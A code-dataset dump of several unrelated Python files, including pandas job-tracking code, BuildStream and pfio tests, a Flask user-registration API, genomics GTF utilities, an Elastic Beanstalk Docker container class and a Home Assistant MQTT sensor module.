pg_unique_jobs = pd.DataFrame.from_dict({'date': [], 'href': []})
pg_unique_jobs['date'] = pd.to_datetime(pg_unique_jobs['date'])
pg_unique_jobs['href'] = pg_unique_jobs['href'].astype(str)
r = pd.merge(pg_unique_jobs, self.__df[['date', 'href']], on='href', how='outer')
return r
@staticmethod
def _get_df_from_pgtable(pg_table: ConnPostgreSQL.PgTable) -> Union[pd.DataFrame, None]:
"""
Получи датафрейм из PgTable.
:param pg_table: Таблица Postgres
:return: Датафрейм, если есть данные, в противном случае - None
"""
if not pg_table:
return
df_from_pg = pd.DataFrame()
for df in pg_table.table_data:
df_from_pg = df_from_pg.append(df)
return df_from_pg
def _get_unique_jobs_df(self) -> None:
"""Сформируй датафрейм для таблицы "unique_jobs"."""
df_merged = self._get_unique_jobs_merged_df()
df_merged = df_merged[pd.isnull(df_merged['date_x'])][['date_y', 'href']].reset_index(drop=True)
df_merged.columns = ['date', 'href']
self.__hh_parsed_data.df_unique_jobs = df_merged
log.info(f'DataFrame for "unique_jobs" table generated')
def _get_unique_closed_jobs_df(self) -> None:
"""Сформируй датафрейм для таблицы "unique_closed_jobs"."""
df_merged = self._get_unique_jobs_merged_df()
df_merged = df_merged[pd.isnull(df_merged['date_y'])].reset_index(drop=True)
df_merged.columns = ['publication_date', 'href', 'closing_date']
df_merged['closing_date'] = datetime.datetime.now().strftime("%Y-%m-%d")
df_merged['href'] = df_merged['href'].astype(str)
df_merged['closing_date'] = pd.to_datetime(df_merged['closing_date'])
df_merged['publication_date'] = pd.to_datetime(df_merged['publication_date'])
df_merged['date_diff'] = (df_merged['closing_date'] - df_merged['publication_date']).dt.days.astype(int)
pg_unique_closed_jobs_raw = self.__pg_conn.get_table(table_name='unique_closed_jobs')
pg_unique_closed_jobs = self._get_df_from_pgtable(pg_unique_closed_jobs_raw)
if pg_unique_closed_jobs is None or pg_unique_closed_jobs.empty:
pg_unique_closed_jobs = pd.DataFrame().from_dict({
'href': [],
'publication_date': [],
'closing_date': [],
'date_diff': []
})
pg_unique_closed_jobs['closing_date'] = pd.to_datetime(pg_unique_closed_jobs['closing_date'])
pg_unique_closed_jobs['publication_date'] = pd.to_datetime(pg_unique_closed_jobs['publication_date'])
pg_unique_closed_jobs['date_diff'] = pg_unique_closed_jobs['date_diff'].astype(int)
pg_unique_closed_jobs['href'] = pg_unique_closed_jobs['href'].astype(str)
df_merged_closed_jobs = pd.merge(pg_unique_closed_jobs, df_merged, on='href', how='outer')
df_merged_closed_jobs = df_merged_closed_jobs[pd.isnull(df_merged_closed_jobs['closing_date_x'])]
df_merged_closed_jobs = df_merged_closed_jobs[['href', 'publication_date_y', 'closing_date_y', 'date_diff_y']]\
.reset_index(drop=True)
df_merged_closed_jobs.columns = ['href', 'publication_date', 'closing_date', 'date_diff']
df_merged_closed_jobs['date_diff'] = df_merged_closed_jobs['date_diff'].astype(int)
self.__hh_parsed_data.df_unique_closed_jobs = df_merged_closed_jobs
log.info(f'DataFrame for "unique_closed_jobs" table generated')
| StarcoderdataPython |
63139 | from pymapper.layer import LayerType, GeoPandasLayer
def test_layer_types():
"""Test the LayerType enum."""
assert list(LayerType.__members__.keys()) == [GeoPandasLayer.LAYER_TYPE]
assert LayerType[GeoPandasLayer.LAYER_TYPE].value == GeoPandasLayer
| StarcoderdataPython |
3352196 | <reponame>cbeach/nes_le
from .super_mario_bros import *
| StarcoderdataPython |
137211 | <reponame>doraskayo/buildstream
# Pylint doesn't play well with fixtures and dependency injection from pytest
# pylint: disable=redefined-outer-name
import os
import pytest
from buildstream import _yaml
from buildstream.exceptions import ErrorDomain, LoadErrorReason
from buildstream.testing.runcli import cli # pylint: disable=unused-import
# Project directory
DATA_DIR = os.path.dirname(os.path.realpath(__file__))
@pytest.mark.datafiles(DATA_DIR)
@pytest.mark.parametrize(
"target,option,value,expected",
[
# Test (var == [ "foo" ]) syntax
("element.bst", "farm", "pony", "a pony"),
("element.bst", "farm", "zebry", "a zebry"),
("element.bst", "farm", "pony, horsy", "a pony and a horsy"),
("element.bst", "farm", "zebry,horsy , pony", "all the animals"),
# Test ("literal" in var) syntax
("element-in.bst", "farm", "zebry, horsy, pony", "a zebry"),
# Test ("literal" not in var) syntax
("element-in.bst", "farm", "zebry, horsy", "no pony"),
# Test (var1 not in var2) syntax (where var1 is enum and var2 is flags)
("element-in.bst", "farm", "zebry, pony", "no horsy"),
],
)
def test_conditional_cli(cli, datafiles, target, option, value, expected):
project = os.path.join(datafiles.dirname, datafiles.basename, "option-flags")
result = cli.run(
project=project,
silent=True,
args=["--option", option, value, "show", "--deps", "none", "--format", "%{vars}", target],
)
result.assert_success()
loaded = _yaml.load_data(result.output)
assert loaded.get_str("result") == expected
@pytest.mark.datafiles(DATA_DIR)
@pytest.mark.parametrize(
"target,option,value,expected",
[
# Test 'var == [ "foo" ]' syntax
("element.bst", "farm", ["pony"], "a pony"),
("element.bst", "farm", ["zebry"], "a zebry"),
("element.bst", "farm", ["pony", "horsy"], "a pony and a horsy"),
("element.bst", "farm", ["zebry", "horsy", "pony"], "all the animals"),
],
)
def test_conditional_config(cli, datafiles, target, option, value, expected):
project = os.path.join(datafiles.dirname, datafiles.basename, "option-flags")
cli.configure({"projects": {"test": {"options": {option: value}}}})
result = cli.run(project=project, silent=True, args=["show", "--deps", "none", "--format", "%{vars}", target])
result.assert_success()
loaded = _yaml.load_data(result.output)
assert loaded.get_str("result") == expected
@pytest.mark.datafiles(DATA_DIR)
@pytest.mark.parametrize(
"cli_option",
[("giraffy"), ("horsy pony")], # Not a valid animal for the farm option # Does not include comma separators
)
def test_invalid_value_cli(cli, datafiles, cli_option):
project = os.path.join(datafiles.dirname, datafiles.basename, "option-flags")
result = cli.run(
project=project,
silent=True,
args=["--option", "farm", cli_option, "show", "--deps", "none", "--format", "%{vars}", "element.bst"],
)
result.assert_main_error(ErrorDomain.LOAD, LoadErrorReason.INVALID_DATA)
@pytest.mark.datafiles(DATA_DIR)
@pytest.mark.parametrize(
"config_option",
[
("pony"), # Not specified as a list
(["horsy", "pony", "giraffy"]), # Invalid giraffy animal for farm option
({"dic": "tionary"}), # Dicts also dont make sense in the config for flags
],
)
def test_invalid_value_config(cli, datafiles, config_option):
project = os.path.join(datafiles.dirname, datafiles.basename, "option-flags")
cli.configure({"projects": {"test": {"options": {"farm": config_option}}}})
result = cli.run(
project=project, silent=True, args=["show", "--deps", "none", "--format", "%{vars}", "element.bst"]
)
result.assert_main_error(ErrorDomain.LOAD, LoadErrorReason.INVALID_DATA)
@pytest.mark.datafiles(DATA_DIR)
def test_missing_values(cli, datafiles):
project = os.path.join(datafiles.dirname, datafiles.basename, "option-flags-missing")
result = cli.run(
project=project, silent=True, args=["show", "--deps", "none", "--format", "%{vars}", "element.bst"]
)
result.assert_main_error(ErrorDomain.LOAD, LoadErrorReason.INVALID_DATA)
| StarcoderdataPython |
24519 | <filename>test1.py
print("hello")
while True:
print("Infinite loop")
| StarcoderdataPython |
8822 | from oacensus.scraper import Scraper
from oacensus.commands import defaults
class TestScraper(Scraper):
"""
Scraper for testing scraper methods.
"""
aliases = ['testscraper']
def scrape(self):
pass
def process(self):
pass
def test_hashcode():
scraper = Scraper.create_instance('testscraper', defaults)
assert len(scraper.hashcode()) == 32
def test_run():
scraper = Scraper.create_instance('testscraper', defaults)
scraper.run()
| StarcoderdataPython |
1630552 | import unittest
from oeqa.oetest import oeRuntimeTest, skipModule
from oeqa.utils.decorators import *
def setUpModule():
#check if DEFAULTTUNE is set and it's value is: x86-64-x32
defaulttune = oeRuntimeTest.tc.d.getVar("DEFAULTTUNE", True)
if "x86-64-x32" not in defaulttune:
skipModule("DEFAULTTUNE is not set to x86-64-x32")
class X32libTest(oeRuntimeTest):
@testcase(281)
@skipUnlessPassed("test_ssh")
def test_x32_file(self):
status1 = self.target.run("readelf -h /bin/ls | grep Class | grep ELF32")[0]
status2 = self.target.run("readelf -h /bin/ls | grep Machine | grep X86-64")[0]
self.assertTrue(status1 == 0 and status2 == 0, msg="/bin/ls isn't an X86-64 ELF32 binary. readelf says: %s" % self.target.run("readelf -h /bin/ls")[1])
| StarcoderdataPython |
171278 | <reponame>seiferma/Docker_YoutubeDLService
from __future__ import unicode_literals
import cherrypy
from .YoutubeVideos import YoutubeVideos
class Youtube(object):
def __init__(self):
self.video = YoutubeVideos()
def _cp_dispatch(self, vpath):
if len(vpath) > 1:
subelement = vpath.pop()
if subelement == 'video':
cherrypy.request.params['videoid'] = vpath.pop(0)
return self.video
return self
return vpath
| StarcoderdataPython |
3328229 | #
# Copyright 2017-2018 Government of Canada
# Public Services and Procurement Canada - buyandsell.gc.ca
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Importing this file causes the standard settings to be loaded
and a standard service manager to be created. This allows services
to be properly initialized before the webserver process has forked.
"""
import asyncio
import logging
import os
import platform
from django.conf import settings
import django.db
from wsgi import application
from vonx.common.eventloop import run_coro
from vonx.indy.manager import IndyManager
from .config import (
indy_general_wallet_config,
indy_wallet_config,
)
LOGGER = logging.getLogger(__name__)
STARTED = False
def get_genesis_path():
if platform.system() == "Windows":
txn_path = os.path.realpath("./genesis")
else:
txn_path = "/home/indy/genesis"
txn_path = os.getenv("INDY_GENESIS_PATH", txn_path)
return txn_path
def indy_client():
if not STARTED:
raise RuntimeError("Indy service is not running")
return MANAGER.get_client()
def indy_env():
return {
"INDY_GENESIS_PATH": get_genesis_path(),
"INDY_LEDGER_URL": os.environ.get("LEDGER_URL"),
"INDY_GENESIS_URL": os.environ.get("GENESIS_URL"),
"LEDGER_PROTOCOL_VERSION": os.environ.get("LEDGER_PROTOCOL_VERSION"),
}
def indy_holder_id():
return settings.INDY_HOLDER_ID
async def add_server_headers(request, response):
host = os.environ.get("HOSTNAME")
if host and "X-Served-By" not in response.headers:
response.headers["X-Served-By"] = host
async def init_app(on_startup=None, on_cleanup=None):
from aiohttp.web import Application
from aiohttp_wsgi import WSGIHandler
from api_indy.tob_anchor.processor import CredentialProcessorQueue
from api_indy.tob_anchor.solrqueue import SolrQueue
from api_indy.tob_anchor.urls import get_routes
wsgi_handler = WSGIHandler(application)
app = Application()
app["manager"] = MANAGER
app.router.add_routes(get_routes())
# all other requests forwarded to django
app.router.add_route("*", "/{path_info:.*}", wsgi_handler)
processor = CredentialProcessorQueue()
processor.setup(app)
solrqueue = SolrQueue()
solrqueue.setup(app)
if on_startup:
app.on_startup.append(on_startup)
if on_cleanup:
app.on_cleanup.append(on_cleanup)
no_headers = os.environ.get("DISABLE_SERVER_HEADERS")
if not no_headers or no_headers == "false":
app.on_response_prepare.append(add_server_headers)
return app
def run_django_proc(proc, *args):
try:
return proc(*args)
finally:
django.db.connections.close_all()
def run_django(proc, *args) -> asyncio.Future:
return asyncio.get_event_loop().run_in_executor(None, run_django_proc, proc, *args)
def run_reindex():
from django.core.management import call_command
batch_size = os.getenv("SOLR_BATCH_SIZE", 500)
call_command("update_index", "--max-retries=5", "--batch-size={}".format(batch_size))
def run_migration():
from django.core.management import call_command
call_command("migrate")
def start_indy_manager(proc: bool = False):
global MANAGER, STARTED
if proc:
MANAGER.start_process()
else:
MANAGER.start()
STARTED = True
def pre_init():
start_indy_manager()
run_coro(perform_register_services())
async def perform_register_services(app=None):
global MANAGER, STARTED
if app:
return app.loop.create_task(
perform_register_services()
)
try:
await register_services()
except:
LOGGER.exception("Error during Indy initialization:")
MANAGER.stop()
STARTED = False
raise
async def register_services():
await asyncio.sleep(2) # temp fix for messages being sent before exchange has started
client = indy_client()
wallet_config = indy_general_wallet_config()
LOGGER.info("Registering indy agent")
wallet_id = await client.register_wallet(
indy_wallet_config(wallet_config))
LOGGER.debug("Indy wallet id: %s", wallet_id)
agent_id = await client.register_issuer(wallet_id, {
"id": indy_holder_id(),
"name": "<NAME>",
"holder_verifier": True,
})
LOGGER.debug("Indy agent id: %s", agent_id)
await client.sync()
LOGGER.debug("Indy client synced")
LOGGER.debug(await client.get_status())
def shutdown():
MANAGER.stop()
MANAGER = IndyManager(indy_env())
| StarcoderdataPython |
3336185 | # -*- coding: utf-8 -*-
from PyQt5.QtCore import pyqtSignal
from PyQt5.QtWidgets import QLabel
_author_ = 'luwt'
_date_ = '2021/12/9 12:27'
class LabelButton(QLabel):
# 点击信号
clicked = pyqtSignal()
def __init__(self, parent):
super().__init__(parent)
def mousePressEvent(self, ev):
self.clicked.emit()
| StarcoderdataPython |
152603 | <reponame>lennykioko/Flask-API
import json
from flask import Blueprint, abort, make_response
from flask_restful import (Resource, Api, reqparse, inputs, fields,
marshal, marshal_with, url_for)
import models
user_fields = {
'username': fields.String,
'email': fields.String,
'password': fields.String
}
class UserList(Resource):
def __init__(self):
self.reqparse = reqparse.RequestParser()
self.reqparse.add_argument(
'username',
required=True,
help='No Username Provided',
location=['form', 'json'])
self.reqparse.add_argument(
'email',
required=True,
help='No email Provided',
location=['form', 'json'])
self.reqparse.add_argument(
'password',
required=True,
help='No Password Provided',
location=['form', 'json'])
self.reqparse.add_argument(
'verify_password',
required=True,
help='No Password Verification Provided',
location=['form', 'json'])
super().__init__()
def post(self):
args = self.reqparse.parse_args()
if args.get('password') == args.get('verify_password'):
user = models.User.create_user(**args)
return marshal(user, user_fields), 201
return make_response(json.dumps({'error' : 'Password and verify_password do not match'}), 400)
users_api = Blueprint('resources.users', __name__)
api = Api(users_api)
api.add_resource(UserList, '/users', endpoint='users')
| StarcoderdataPython |
3325832 | <reponame>Ermlab/python-ddd<gh_stars>100-1000
from seedwork.infrastructure.request_context import request_context
from seedwork.infrastructure.logging import logger, LoggerFactory
from config.container import Container
from modules.catalog.domain.repositories import SellerRepository
from modules.catalog.application.query.get_all_listings import GetAllListings
from modules.catalog.application.query.get_listings_of_seller import GetListingsOfSeller
from modules.catalog.application.command.create_listing_draft import (
CreateListingDraftCommand,
)
# a sample command line script to print all listings
# run with "cd src && python -m cli"
# configure logger prior to first usage
LoggerFactory.configure(logger_name="cli")
# configure catalog module
container = Container()
container.config.from_dict(
dict(
DATABASE_URL="postgresql://postgres:password@localhost/postgres",
DEBUG=True,
)
)
# instantiate catalog module
catalog_module = container.catalog_module()
logger.info("Application configured")
# let's generate a fake seller id for now
seller_id = SellerRepository.next_id()
# interact with a catalog module by issuing queries and commands
# use request context if you want to logically separate queries/commands
# from each other in the logs
with request_context:
command = CreateListingDraftCommand(
title="Foo", description="Bar", price=1, seller_id=seller_id
)
result = catalog_module.execute_command(command)
print(result)
if result.is_ok():
logger.info("Draft added")
else:
logger.error(result.get_errors())
with request_context:
query_result = catalog_module.execute_query(GetAllListings())
logger.info(f"All listings: {query_result.result}")
with request_context:
query_result = catalog_module.execute_query(
GetListingsOfSeller(seller_id=seller_id)
)
logger.info(f"Listings of seller {seller_id}: {query_result.result}")
| StarcoderdataPython |
8884 | import os
import re
from typing import Tuple
from pfio._typing import Union
from pfio.container import Container
from pfio.io import IO, create_fs_handler
class FileSystemDriverList(object):
def __init__(self):
# TODO(tianqi): dynamically create this list
# as well as the patterns upon loading the pfio module.
self.scheme_list = ["hdfs", "posix"]
self.posix_pattern = re.compile(r"file:\/\/(?P<path>.+)")
self.hdfs_pattern = re.compile(r"(?P<path>hdfs:\/\/.+)")
self.pattern_list = {"hdfs": self.hdfs_pattern,
"posix": self.posix_pattern, }
def _determine_fs_type(self, path: str) -> Tuple[str, str, bool]:
if None is not path:
for fs_type, pattern in self.pattern_list.items():
ret = pattern.match(path)
if ret:
return (fs_type, ret.groupdict()["path"], True)
return ("posix", path, False)
def format_path(self, fs: IO, path: str) -> Tuple[str, bool]:
fs_type = fs.type
if fs_type in self.pattern_list.keys():
pattern = self.pattern_list[fs_type]
ret = pattern.match(path)
if ret:
return (ret.groupdict()["path"], True)
else:
return (path, False)
else:
return (path, False)
def get_handler_from_path(self, path: str) -> Tuple[IO, str, bool]:
(fs_type, actual_path, is_URI) = self._determine_fs_type(path)
handler = create_fs_handler(fs_type)
return (handler, actual_path, is_URI)
def get_handler_for_root(self,
uri_or_handler_name: str) -> Tuple[IO, str, bool]:
if uri_or_handler_name in self.pattern_list.keys():
return (create_fs_handler(uri_or_handler_name), "", False)
else:
(new_handler, actual_path, is_URI) = self.get_handler_from_path(
uri_or_handler_name)
new_handler.root = actual_path
return (new_handler, actual_path, is_URI)
def is_supported_scheme(self, scheme: str) -> bool:
return scheme in self.scheme_list
class DefaultContext(object):
def __init__(self):
self._fs_handler_list = FileSystemDriverList()
self._root = ""
self._default_context = \
self._fs_handler_list.get_handler_for_root("posix")[0]
def set_root(self, uri_or_handler: Union[str, IO]) -> None:
# TODO(check) if root is directory
if isinstance(uri_or_handler, IO):
handler = uri_or_handler
self._root = ""
else:
(handler, self._root, is_URI) = \
self.get_handler_by_name(uri_or_handler)
assert handler is not None
if self._root:
if not handler.isdir(self._root):
raise RuntimeError("the URI does not point to a directory")
self._default_context = handler
def get_handler(self, path: str = "") -> Tuple[IO, str]:
(handler, formatted_path,
is_URI) = self._fs_handler_list.get_handler_from_path(path)
if not is_URI:
actual_path = os.path.join(self._root, formatted_path)
return (self._default_context, actual_path)
else:
return (handler, formatted_path)
def open_as_container(self, path: str) -> Container:
(handler, formatted_path,
is_URI) = self._fs_handler_list.get_handler_from_path(path)
if not is_URI:
actual_path = os.path.join(self._root, formatted_path)
handler = self._default_context
else:
actual_path = formatted_path
self._root = ""
return handler.open_as_container(actual_path)
def get_handler_by_name(self, path: str) -> Tuple[IO, str, bool]:
return self._fs_handler_list.get_handler_for_root(path)
def get_root_dir(self) -> str:
return self._root
def is_supported_scheme(self, scheme: str) -> bool:
return self._fs_handler_list.is_supported_scheme(scheme)
| StarcoderdataPython |
92378 | from Bio import SeqIO
import gzip
import os
import sys
from seqtools.general import rc, translate
def parse_gtf_dict(gtf_str):
return {i.split(' "')[0]:i.split(' "')[1] for i in gtf_str.split('"; ')}
def gtf_to_gene_length(gtf_file, outfile, sum_type='transcript_longest'):
"""
Get Gene length, 3 options:
1. transcript_longest: Length of longest transcript (default)
2. gene_unique: Length of all unique 'expressed DNA' i.e. count every base that is expressed once
3. gene_all: Total length of all 'expressed DNA' i.e. if transcripts contain overlapping exons then count exon length multiple times
"""
if not sum_type == 'transcript_longest':
gene_dict = {}
gene_count = 0
with open(gtf_file) as input_fh:
for line in input_fh:
if not line.startswith('#'):
fields = line.strip().split('\t')
if fields[2] == 'exon':
gtf_dict = parse_gtf_dict(fields[8])
if not gtf_dict['gene_name'] in gene_dict:
gene_count += 1
if gene_count % 1000 == 0:
print(' - {0} genes processed'.format(gene_count))
gene_dict[gtf_dict['gene_name']] = []
gene_dict[gtf_dict['gene_name']] += [i for i in range(int(fields[3])-1, int(fields[4]))]
gene_lengths = []
for gene in gene_dict:
if sum_type == 'gene_all':
gene_lengths.append('{0},{1}\n'.format(gene, len(gene_dict[gene])))
elif sum_type == 'gene_unique':
gene_lengths.append('{0},{1}\n'.format(gene, len(set(gene_dict[gene]))))
else:
raise IOError('sum_type must be gene_all, gene_unique or transcript_longest')
else:
gene_dict = {}
gene_count = 0
with open(gtf_file) as input_fh:
for line in input_fh:
if not line.startswith('#'):
fields = line.strip().split('\t')
if fields[2] == 'exon':
gtf_dict = parse_gtf_dict(fields[8])
if not gtf_dict['gene_name'] in gene_dict:
gene_count += 1
if gene_count % 1000 == 0:
print(' - {0} genes processed'.format(gene_count))
gene_dict[gtf_dict['gene_name']] = {}
if not gtf_dict['transcript_id'] in gene_dict[gtf_dict['gene_name']]:
gene_dict[gtf_dict['gene_name']][gtf_dict['transcript_id']] = 0
gene_dict[gtf_dict['gene_name']][gtf_dict['transcript_id']] += int(fields[4]) - int(fields[3]) + 1
gene_lengths = []
for gene in gene_dict:
transcript_lengths = gene_dict[gene].values()
gene_lengths.append('{0},{1}\n'.format(gene, max(transcript_lengths)))
with open(outfile, 'w') as output_fh:
for gene in gene_lengths:
output_fh.write(gene)
def get_transcripts(ens_gene_id, output_dir, gtf_file, fasta_str,
protein=False):
exons = {}
if protein == True:
feature_type = 'CDS'
else:
feature_type = 'exon'
with open(gtf_file) as input_fh:
for line in input_fh:
if not line.startswith('#'):
fields = line.strip().split('\t')
if fields[2] == feature_type:
gtf_dict = parse_gtf_dict(fields[8])
if gtf_dict['gene_id'] == ens_gene_id:
if not gtf_dict['transcript_id'] in exons:
exons[gtf_dict['transcript_id']] = []
exons[gtf_dict['transcript_id']].append({
'chrom': fields[0],
'start': int(fields[3]),
'end': int(fields[4]),
'strand': fields[6],
})
for transcript in exons:
if set([i['strand'] for i in exons[transcript]]) == set('+'):
strand = '+'
sorted_exons = sorted(exons[transcript], key=lambda i:i['start'])
elif set([i['strand'] for i in exons[transcript]]) == set('-'):
strand = '-'
sorted_exons = sorted(exons[transcript], key=lambda i:i['start'], reverse=True)
sequence = ''
with gzip.open(fasta_str.format(exons[transcript][0]['chrom']), 'rt') as input_fh:
for record in SeqIO.parse(input_fh, 'fasta'):
chrom_seq = str(record.seq)
for exon in sorted_exons:
if strand == '+':
sequence += chrom_seq[exon['start']-1:exon['end']]
elif strand == '-':
sequence += rc(chrom_seq[exon['start']-1:exon['end']])
if protein == True:
sequence = translate(sequence)
with open(os.path.join(output_dir, transcript + '.fa'), 'w') as output_fh:
output_fh.write('>{0}\n{1}\n'.format(transcript, sequence))
print('fasta file written: {0}/{1}.fa'.format(output_dir, transcript))
if __name__ == '__main__':
if len(sys.argv) == 3:
# gtf wget from ensembl (wget ftp://ftp.ensembl.org/pub/release-95/gtf/mus_musculus/Mus_musculus.GRCm38.95.gtf.gz)
#gtf_to_gene_length(gtf_file='Mus_musculus.GRCm38.95.gtf',
# outfile='mm10_gene_lengths.txt')
gtf_to_gene_length(gtf_file=sys.argv[1],
outfile=sys.argv[2])
elif len(sys.argv) == 4:
gtf_to_gene_length(gtf_file=sys.argv[1],
outfile=sys.argv[2],
include_all=sys.argv[3])
else:
pass
| StarcoderdataPython |
1724328 | <filename>amr_verbnet_semantics/test/test_verbnet.py
from nltk.corpus.reader import VerbnetCorpusReader
from nltk.corpus.util import LazyCorpusLoader
verbnet = LazyCorpusLoader("verbnet3.4", VerbnetCorpusReader, r"(?!\.).*\.xml")
print(verbnet.frames("escape-51.1-1"))
try:
print(verbnet.frames("escape-51.1-2"))
except Exception as e:
print(e)
print(verbnet.frames("leave-51.2"))
print(verbnet.subclasses("escape-51.1-1"))
| StarcoderdataPython |
3328938 | <filename>ebcli/docker/container.py
# Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import abc
import hashlib
from . import commands
from . import dockerrun
from . import log
from ..objects.exceptions import CommandError
class Container(object):
"""
Abstract class subclassed by PreconfiguredContainer and GenericContainer.
Container holds all of the data and most of the functionality needed to
run a Docker container locally.
"""
__metaclass__ = abc.ABCMeta
def __init__(self, fs_handler, soln_stk, container_cfg,
envvars_map=None, host_port=None):
"""
Constructor for Container.
:param fs_handler: ContainerFSHandler: manages container related files
:param soln_stk: SolutionStack: environment's solution stack
:param container_cfg: dict: container_config.json as dict
:param envvars_map: dict: optional key-val map of environment variables
:param host_port: str: optional host port. Same as container port by default
"""
self.fs_handler = fs_handler
self.soln_stk = soln_stk
self.container_cfg = container_cfg
self.envvars_map = envvars_map
self.host_port = host_port
def start(self):
"""
Download S3 object storing .dockercfg if Authentication provided
in Dockerrun.aws.json, containerize app by adding Dockerfile if user
doesn't provide one, then pull, build, and run the container.
:return None
"""
if self.fs_handler.require_append_dockerignore():
self.fs_handler.append_dockerignore()
if self.fs_handler.require_new_dockerfile():
self._containerize()
if self._require_pull():
self._pull()
self._remove()
img_id = self._build()
self._run(img_id)
def validate(self):
"""
Validates the container is configured properly.
:return None
"""
pass
def get_name(self, hash_obj=hashlib.sha1):
"""
Return the name that is or will be assigned to this container.
:return str
"""
hash_key = self.fs_handler.docker_proj_path.encode('utf-8')
return hash_obj(hash_key).hexdigest()
def is_running(self):
return commands.is_running(self.get_name())
@abc.abstractmethod
def _containerize(self, destination_dockerfile=None):
"""
Make a Dockerfile to destiantion path used for when user doesn't
provide a Dockerfile.
:param destination_dockerfile: str: full path to destination Dockerfile
:return None
"""
pass
def _get_full_docker_path(self):
"""
Return the full path to the Dockerfile we will be using for pulling
and building Docker images.
:return str
"""
if self.fs_handler.dockerfile_exists:
return self.fs_handler.dockerfile_path
else: # Then we create one at .elasticbeanstalk/Dockerfile.local
return self.fs_handler.new_dockerfile_path
def _require_pull(self):
return dockerrun.require_docker_pull(self.fs_handler.dockerrun)
def _pull(self):
return commands.pull_img(self._get_full_docker_path())
def _build(self):
return commands.build_img(self.fs_handler.docker_proj_path,
self._get_full_docker_path())
def _run(self, img_id):
log_volume_map = self._get_log_volume_map()
if log_volume_map:
log.make_logdirs(self.fs_handler.logdir_path, log_volume_map)
return commands.run_container(self._get_full_docker_path(),
img_id,
envvars_map=self.envvars_map,
host_port=self.host_port,
volume_map=log_volume_map,
name=self.get_name())
def _get_log_volume_map(self):
return log.get_log_volume_map(self.fs_handler.logdir_path,
self.fs_handler.dockerrun)
def _remove(self):
try:
commands.rm_container(self.get_name(), force=True)
except CommandError:
pass
| StarcoderdataPython |
1764868 | <reponame>DRubioBizcaino/AIS-home-assistant
"""
Support for MQTT sensors.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.mqtt/
"""
import logging
import json
from typing import Optional
from datetime import timedelta
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.components import sensor
from homeassistant.components.mqtt import (
ATTR_DISCOVERY_HASH,
CONF_QOS,
CONF_STATE_TOPIC,
MqttAttributes,
MqttAvailability,
MqttDiscoveryUpdate,
MqttEntityDeviceInfo,
subscription,
)
from homeassistant.components.mqtt.discovery import (
MQTT_DISCOVERY_NEW,
clear_discovery_hash,
)
from homeassistant.components.sensor import DEVICE_CLASSES_SCHEMA
from homeassistant.const import (
CONF_FORCE_UPDATE,
CONF_NAME,
CONF_VALUE_TEMPLATE,
STATE_UNKNOWN,
CONF_UNIT_OF_MEASUREMENT,
CONF_ICON,
CONF_DEVICE_CLASS,
CONF_DEVICE,
)
from homeassistant.helpers.entity import Entity
from homeassistant.components import mqtt
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.typing import HomeAssistantType, ConfigType
from homeassistant.helpers.dispatcher import async_dispatcher_connect
_LOGGER = logging.getLogger(__name__)
CONF_EXPIRE_AFTER = "expire_after"
CONF_JSON_ATTRS = "json_attributes"
CONF_UNIQUE_ID = "unique_id"
DEFAULT_NAME = "MQTT Sensor"
DEFAULT_FORCE_UPDATE = False
DEPENDENCIES = ["mqtt"]
SCAN_INTERVAL = timedelta(seconds=600000000)
MQTT_DEVICES = []
NET_DEVICES = []
DOM_DEVICES = []
PLATFORM_SCHEMA = (
mqtt.MQTT_RO_PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_UNIT_OF_MEASUREMENT): cv.string,
vol.Optional(CONF_ICON): cv.icon,
vol.Optional(CONF_DEVICE_CLASS): DEVICE_CLASSES_SCHEMA,
vol.Optional(CONF_JSON_ATTRS, default=[]): cv.ensure_list_csv,
vol.Optional(CONF_EXPIRE_AFTER): cv.positive_int,
vol.Optional(CONF_FORCE_UPDATE, default=DEFAULT_FORCE_UPDATE): cv.boolean,
vol.Optional(CONF_UNIQUE_ID): cv.string,
vol.Optional(CONF_DEVICE): mqtt.MQTT_ENTITY_DEVICE_INFO_SCHEMA,
}
)
.extend(mqtt.MQTT_AVAILABILITY_SCHEMA.schema)
.extend(mqtt.MQTT_JSON_ATTRS_SCHEMA.schema)
)
def get_text():
global MQTT_DEVICES
global NET_DEVICES
global DOM_DEVICES
"""Return the state of the entity."""
info = ""
if len(MQTT_DEVICES) > 0:
info = (
"\n### Sterowalne urządzenia w brokerze mqtt ("
+ str(len(MQTT_DEVICES))
+ "):\n"
)
for d in MQTT_DEVICES:
info += "- " + d["FriendlyName"] + ", http://" + d["IPAddress"] + "\n"
if len(NET_DEVICES) > 0:
info += "\n### Sterowalne urządzenia w sieci (" + str(len(NET_DEVICES)) + "):\n"
for d in NET_DEVICES:
info += str(d) + "\n"
if len(DOM_DEVICES) > 0:
info += "\n### Bramki AIS dom (" + str(len(DOM_DEVICES)) + "):\n"
for d in DOM_DEVICES:
info += str(d) + "\n"
return info
def get_text_to_say():
"""Return the info about devices"""
import time
# Wait for 5 seconds
time.sleep(10)
if len(MQTT_DEVICES) > 0 or len(NET_DEVICES) > 0:
info = ""
else:
info = "Nie wykryto sterowanych urządzeń."
if len(MQTT_DEVICES) > 0:
info += "Liczba wykrytych sterowalnych urządzeń podłączonych do bramki: " + str(
len(MQTT_DEVICES)
)
if len(NET_DEVICES) > 0:
if len(MQTT_DEVICES) > 0:
info += ". "
info += "Liczba wykrytych sterowalnych urządzeń w sieci: " + str(
len(NET_DEVICES)
)
return info
async def async_setup_platform(
hass: HomeAssistantType, config: ConfigType, async_add_entities, discovery_info=None
):
"""Set up MQTT sensors through configuration.yaml."""
await _async_setup_entity(config, async_add_entities)
